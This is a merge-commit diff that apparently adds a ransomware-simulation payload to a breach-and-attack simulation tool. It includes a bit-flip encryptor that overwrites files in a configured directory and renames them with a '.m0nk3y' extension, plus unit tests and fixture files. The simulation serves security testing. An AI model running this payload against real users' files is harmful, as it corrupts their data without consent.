Merge pull request #1264 from guardicore/ransomware-bitflip-encryption

Ransomware bitflip encryption
This commit is contained in:
Mike Salvatore 2021-06-24 08:24:52 -04:00 committed by GitHub
commit 6744ee71fc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
17 changed files with 326 additions and 24 deletions

View File

@ -0,0 +1,21 @@
from pathlib import Path
from infection_monkey.utils import bit_manipulators
class BitflipEncryptor:
def __init__(self, chunk_size=64):
self._chunk_size = chunk_size
def encrypt_file_in_place(self, filepath: Path):
with open(filepath, "rb+") as f:
data = f.read(self._chunk_size)
while data:
num_bytes_read = len(data)
encrypted_data = bit_manipulators.flip_bits(data)
f.seek(-num_bytes_read, 1)
f.write(encrypted_data)
data = f.read(self._chunk_size)

View File

@ -0,0 +1,21 @@
from pathlib import Path
from typing import List, Set
from infection_monkey.utils.dir_utils import (
file_extension_filter,
filter_files,
get_all_regular_files_in_directory,
is_not_shortcut_filter,
is_not_symlink_filter,
)
def select_production_safe_target_files(target_dir: Path, extensions: Set) -> List[Path]:
file_filters = [
file_extension_filter(extensions),
is_not_shortcut_filter,
is_not_symlink_filter,
]
all_files = get_all_regular_files_in_directory(target_dir)
return filter_files(all_files, file_filters)

View File

@ -1,43 +1,55 @@
import logging import logging
from pathlib import Path from pathlib import Path
from typing import List, Optional, Tuple
from infection_monkey.ransomware.bitflip_encryptor import BitflipEncryptor
from infection_monkey.ransomware.file_selectors import select_production_safe_target_files
from infection_monkey.ransomware.valid_file_extensions import VALID_FILE_EXTENSIONS_FOR_ENCRYPTION from infection_monkey.ransomware.valid_file_extensions import VALID_FILE_EXTENSIONS_FOR_ENCRYPTION
from infection_monkey.utils.dir_utils import (
file_extension_filter,
filter_files,
get_all_regular_files_in_directory,
is_not_shortcut_filter,
is_not_symlink_filter,
)
from infection_monkey.utils.environment import is_windows_os from infection_monkey.utils.environment import is_windows_os
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
EXTENSION = ".m0nk3y"
CHUNK_SIZE = 4096 * 24
class RansomewarePayload: class RansomewarePayload:
def __init__(self, config: dict): def __init__(self, config: dict):
LOG.info(f"Windows dir configured for encryption is {config['windows_dir']}") LOG.info(f"Windows dir configured for encryption is \"{config['windows_dir']}\"")
LOG.info(f"Linux dir configured for encryption is {config['linux_dir']}") LOG.info(f"Linux dir configured for encryption is \"{config['linux_dir']}\"")
self.target_dir = Path(config["windows_dir"] if is_windows_os() else config["linux_dir"]) self._target_dir = config["windows_dir"] if is_windows_os() else config["linux_dir"]
self._new_file_extension = EXTENSION
self._valid_file_extensions_for_encryption = VALID_FILE_EXTENSIONS_FOR_ENCRYPTION.copy()
self._valid_file_extensions_for_encryption.discard(self._new_file_extension)
self._encryptor = BitflipEncryptor(chunk_size=CHUNK_SIZE)
def run_payload(self): def run_payload(self):
file_list = self._find_files() file_list = self._find_files()
self._encrypt_files(file_list) self._encrypt_files(file_list)
def _find_files(self): def _find_files(self) -> List[Path]:
file_filters = [ if not self._target_dir:
file_extension_filter(VALID_FILE_EXTENSIONS_FOR_ENCRYPTION), return []
is_not_shortcut_filter,
is_not_symlink_filter,
]
all_files = get_all_regular_files_in_directory(self.target_dir) return select_production_safe_target_files(
return filter_files(all_files, file_filters) Path(self._target_dir), self._valid_file_extensions_for_encryption
)
def _encrypt_files(self, file_list): def _encrypt_files(self, file_list: List[Path]) -> List[Tuple[Path, Optional[Exception]]]:
for file in file_list: results = []
self._encrypt_file(file) for filepath in file_list:
try:
self._encryptor.encrypt_file_in_place(filepath)
self._add_extension(filepath)
results.append((filepath, None))
except Exception as ex:
results.append((filepath, ex))
def _encrypt_file(self, file): return results
pass
def _add_extension(self, filepath: Path):
new_filepath = filepath.with_suffix(f"{filepath.suffix}{self._new_file_extension}")
filepath.rename(new_filepath)

View File

@ -0,0 +1,11 @@
def flip_bits(data: bytes) -> bytes:
flipped_bits = bytearray(len(data))
for i, byte in enumerate(data):
flipped_bits[i] = flip_bits_in_single_byte(byte)
return bytes(flipped_bits)
def flip_bits_in_single_byte(byte) -> int:
return 255 ^ byte

View File

@ -0,0 +1 @@
Monkey see, Monkey do.

View File

@ -0,0 +1 @@
This is a shortcut.

View File

@ -0,0 +1 @@
Hello world!

View File

@ -0,0 +1,2 @@
ABCDEFGHIJNLMNOPQRSTUVWXYZabcdefghijnlmnopqrstuvwxyz1234567890!@#$%^&*()
The quick brown fox jumps over the lazy dog.

View File

@ -0,0 +1 @@
ýª\t¬•S—Š¤,sÖ¼ˆ¾W #Aï§ÎÖ‡ç½ài|ƶÆKl;5à?ÝÐß< ±9XÝû<C39D>êĆ·â ±"TsïÒÀj-íÛZ”ü ó

View File

@ -0,0 +1,13 @@
import shutil
from pathlib import Path
import pytest
@pytest.fixture
def ransomware_target(tmp_path, data_for_tests_dir):
ransomware_test_data = Path(data_for_tests_dir) / "ransomware_targets"
ransomware_target = tmp_path / "ransomware_target"
shutil.copytree(ransomware_test_data, ransomware_target)
return ransomware_target

View File

@ -0,0 +1,23 @@
SUBDIR = "subdir"
ALL_ZEROS_PDF = "all_zeros.pdf"
ALREADY_ENCRYPTED_TXT_M0NK3Y = "already_encrypted.txt.m0nk3y"
HELLO_TXT = "hello.txt"
SHORTCUT_LNK = "shortcut.lnk"
TEST_KEYBOARD_TXT = "test_keyboard.txt"
TEST_LIB_DLL = "test_lib.dll"
ALL_ZEROS_PDF_CLEARTEXT_SHA256 = "ab3df617aaa3140f04dc53f65b5446f34a6b2bdbb1f7b78db8db4d067ba14db9"
ALREADY_ENCRYPTED_TXT_M0NK3Y_CLEARTEXT_SHA256 = (
"ff5e58498962ab8bd619d3a9cd24b9298e7efc25b4967b1ce3f03b0e6de2aa7a"
)
HELLO_TXT_CLEARTEXT_SHA256 = "0ba904eae8773b70c75333db4de2f3ac45a8ad4ddba1b242f0b3cfc199391dd8"
SHORTCUT_LNK_CLEARTEXT_SHA256 = "5069c8b7c3c70fad55bf0f0790de787080b1b4397c4749affcd3e570ff53aad9"
TEST_KEYBOARD_TXT_CLEARTEXT_SHA256 = (
"9d1a38784b7eefef6384bfc4b89048017db840adace11504a947016072750b2b"
)
TEST_LIB_DLL_CLEARTEXT_SHA256 = "0922d3132f2378edf313b8c2b6609a2548879911686994ca45fc5c895a7e91b1"
ALL_ZEROS_PDF_ENCRYPTED_SHA256 = "779c176e820dbdaf643419232cb4d2760360c8633d6fe209cf706707db799b4d"
TEST_KEYBOARD_TXT_ENCRYPTED_SHA256 = (
"80701f3694abdd25ef3df7166b3fc5189b2afb4df32f7d5adbfed61ad07b9cd5"
)

View File

@ -0,0 +1,34 @@
import os
from tests.unit_tests.infection_monkey.ransomware.ransomware_target_files import (
TEST_KEYBOARD_TXT,
TEST_KEYBOARD_TXT_CLEARTEXT_SHA256,
TEST_KEYBOARD_TXT_ENCRYPTED_SHA256,
)
from tests.utils import hash_file
from infection_monkey.ransomware.bitflip_encryptor import BitflipEncryptor
def test_file_encrypted(ransomware_target):
test_keyboard = ransomware_target / TEST_KEYBOARD_TXT
assert hash_file(test_keyboard) == TEST_KEYBOARD_TXT_CLEARTEXT_SHA256
encryptor = BitflipEncryptor(chunk_size=64)
encryptor.encrypt_file_in_place(test_keyboard)
assert hash_file(test_keyboard) == TEST_KEYBOARD_TXT_ENCRYPTED_SHA256
def test_file_encrypted_in_place(ransomware_target):
test_keyboard = ransomware_target / TEST_KEYBOARD_TXT
expected_inode = os.stat(test_keyboard).st_ino
encryptor = BitflipEncryptor(chunk_size=64)
encryptor.encrypt_file_in_place(test_keyboard)
actual_inode = os.stat(test_keyboard).st_ino
assert expected_inode == actual_inode

View File

@ -0,0 +1,122 @@
import os
import pytest
from tests.unit_tests.infection_monkey.ransomware.ransomware_target_files import (
ALL_ZEROS_PDF,
ALL_ZEROS_PDF_CLEARTEXT_SHA256,
ALL_ZEROS_PDF_ENCRYPTED_SHA256,
ALREADY_ENCRYPTED_TXT_M0NK3Y,
ALREADY_ENCRYPTED_TXT_M0NK3Y_CLEARTEXT_SHA256,
HELLO_TXT,
HELLO_TXT_CLEARTEXT_SHA256,
SHORTCUT_LNK,
SHORTCUT_LNK_CLEARTEXT_SHA256,
SUBDIR,
TEST_KEYBOARD_TXT,
TEST_KEYBOARD_TXT_CLEARTEXT_SHA256,
TEST_KEYBOARD_TXT_ENCRYPTED_SHA256,
TEST_LIB_DLL,
TEST_LIB_DLL_CLEARTEXT_SHA256,
)
from tests.utils import hash_file, is_user_admin
from infection_monkey.ransomware.ransomware_payload import EXTENSION, RansomewarePayload
def with_extension(filename):
return f"{filename}{EXTENSION}"
@pytest.fixture
def ransomware_payload_config(ransomware_target):
return {"linux_dir": str(ransomware_target), "windows_dir": str(ransomware_target)}
@pytest.fixture
def ransomware_payload(ransomware_payload_config):
return RansomewarePayload(ransomware_payload_config)
def test_file_with_excluded_extension_not_encrypted(ransomware_target, ransomware_payload):
ransomware_payload.run_payload()
assert hash_file(ransomware_target / TEST_LIB_DLL) == TEST_LIB_DLL_CLEARTEXT_SHA256
def test_shortcut_not_encrypted(ransomware_target, ransomware_payload):
ransomware_payload.run_payload()
assert hash_file(ransomware_target / SHORTCUT_LNK) == SHORTCUT_LNK_CLEARTEXT_SHA256
@pytest.mark.skipif(
os.name == "nt" and not is_user_admin(), reason="Test requires admin rights on Windows"
)
def test_symlink_not_encrypted(ransomware_target, ransomware_payload):
SYMLINK = "symlink.pdf"
link_path = ransomware_target / SYMLINK
link_path.symlink_to(ransomware_target / TEST_LIB_DLL)
ransomware_payload.run_payload()
assert hash_file(ransomware_target / SYMLINK) == TEST_LIB_DLL_CLEARTEXT_SHA256
def test_encryption_not_recursive(ransomware_target, ransomware_payload):
ransomware_payload.run_payload()
assert hash_file(ransomware_target / SUBDIR / HELLO_TXT) == HELLO_TXT_CLEARTEXT_SHA256
def test_all_files_with_included_extension_encrypted(ransomware_target, ransomware_payload):
assert hash_file(ransomware_target / ALL_ZEROS_PDF) == ALL_ZEROS_PDF_CLEARTEXT_SHA256
assert hash_file(ransomware_target / TEST_KEYBOARD_TXT) == TEST_KEYBOARD_TXT_CLEARTEXT_SHA256
ransomware_payload.run_payload()
assert (
hash_file(ransomware_target / with_extension(ALL_ZEROS_PDF))
== ALL_ZEROS_PDF_ENCRYPTED_SHA256
)
assert (
hash_file(ransomware_target / with_extension(TEST_KEYBOARD_TXT))
== TEST_KEYBOARD_TXT_ENCRYPTED_SHA256
)
def test_file_encrypted_in_place(ransomware_target, ransomware_payload):
expected_test_keyboard_inode = os.stat(ransomware_target / TEST_KEYBOARD_TXT).st_ino
ransomware_payload.run_payload()
actual_test_keyboard_inode = os.stat(
ransomware_target / with_extension(TEST_KEYBOARD_TXT)
).st_ino
assert expected_test_keyboard_inode == actual_test_keyboard_inode
def test_encryption_reversible(ransomware_target, ransomware_payload):
orig_path = ransomware_target / TEST_KEYBOARD_TXT
new_path = ransomware_target / with_extension(TEST_KEYBOARD_TXT)
assert hash_file(orig_path) == TEST_KEYBOARD_TXT_CLEARTEXT_SHA256
ransomware_payload.run_payload()
assert hash_file(new_path) == TEST_KEYBOARD_TXT_ENCRYPTED_SHA256
new_path.rename(orig_path)
ransomware_payload.run_payload()
assert (
hash_file(ransomware_target / with_extension(TEST_KEYBOARD_TXT))
== TEST_KEYBOARD_TXT_CLEARTEXT_SHA256
)
def test_skip_already_encrypted_file(ransomware_target, ransomware_payload):
ransomware_payload.run_payload()
assert not (ransomware_target / with_extension(ALREADY_ENCRYPTED_TXT_M0NK3Y)).exists()
assert (
hash_file(ransomware_target / ALREADY_ENCRYPTED_TXT_M0NK3Y)
== ALREADY_ENCRYPTED_TXT_M0NK3Y_CLEARTEXT_SHA256
)

View File

@ -0,0 +1,29 @@
from infection_monkey.utils import bit_manipulators
def test_flip_bits_in_single_byte():
for i in range(0, 256):
assert bit_manipulators.flip_bits_in_single_byte(i) == (255 - i)
def test_flip_bits():
test_input = bytes(b"ABCDEFGHIJNLMNOPQRSTUVWXYZabcdefghijnlmnopqrstuvwxyz1234567890!@#$%^&*()")
expected_output = (
b"\xbe\xbd\xbc\xbb\xba\xb9\xb8\xb7\xb6\xb5\xb1\xb3\xb2\xb1\xb0\xaf\xae\xad"
b"\xac\xab\xaa\xa9\xa8\xa7\xa6\xa5\x9e\x9d\x9c\x9b\x9a\x99\x98\x97\x96\x95"
b"\x91\x93\x92\x91\x90\x8f\x8e\x8d\x8c\x8b\x8a\x89\x88\x87\x86\x85\xce\xcd"
b"\xcc\xcb\xca\xc9\xc8\xc7\xc6\xcf\xde\xbf\xdc\xdb\xda\xa1\xd9\xd5\xd7\xd6"
)
assert bit_manipulators.flip_bits(test_input) == expected_output
def test_flip_bits__reversible():
test_input = bytes(
b"ABCDEFGHIJNLM\xffNOPQRSTUVWXYZabcde\xf5fghijnlmnopqr\xC3stuvwxyz1\x87234567890!@#$%^&*()"
)
test_output = bit_manipulators.flip_bits(test_input)
test_output = bit_manipulators.flip_bits(test_output)
assert test_input == test_output

View File

@ -1,5 +1,7 @@
import ctypes import ctypes
import hashlib
import os import os
from pathlib import Path
def is_user_admin(): def is_user_admin():
@ -7,3 +9,12 @@ def is_user_admin():
return os.getuid() == 0 return os.getuid() == 0
return ctypes.windll.shell32.IsUserAnAdmin() return ctypes.windll.shell32.IsUserAnAdmin()
def hash_file(filepath: Path):
sha256 = hashlib.sha256()
with open(filepath, "rb") as f:
for block in iter(lambda: f.read(65536), b""):
sha256.update(block)
return sha256.hexdigest()

View File

@ -171,7 +171,6 @@ ISLAND # unused variable (monkey/monkey_island/cc/services/utils/node_states.py
MONKEY_LINUX_RUNNING # unused variable (monkey/monkey_island/cc/services/utils/node_states.py:26) MONKEY_LINUX_RUNNING # unused variable (monkey/monkey_island/cc/services/utils/node_states.py:26)
import_status # monkey_island\cc\resources\configuration_import.py:19 import_status # monkey_island\cc\resources\configuration_import.py:19
config_schema # monkey_island\cc\resources\configuration_import.py:25 config_schema # monkey_island\cc\resources\configuration_import.py:25
get_files_to_encrypt # monkey/infection_monkey/ransomware/utils.py:82
# these are not needed for it to work, but may be useful extra information to understand what's going on # these are not needed for it to work, but may be useful extra information to understand what's going on
WINDOWS_PBA_TYPE # unused variable (monkey/monkey_island/cc/resources/pba_file_upload.py:23) WINDOWS_PBA_TYPE # unused variable (monkey/monkey_island/cc/resources/pba_file_upload.py:23)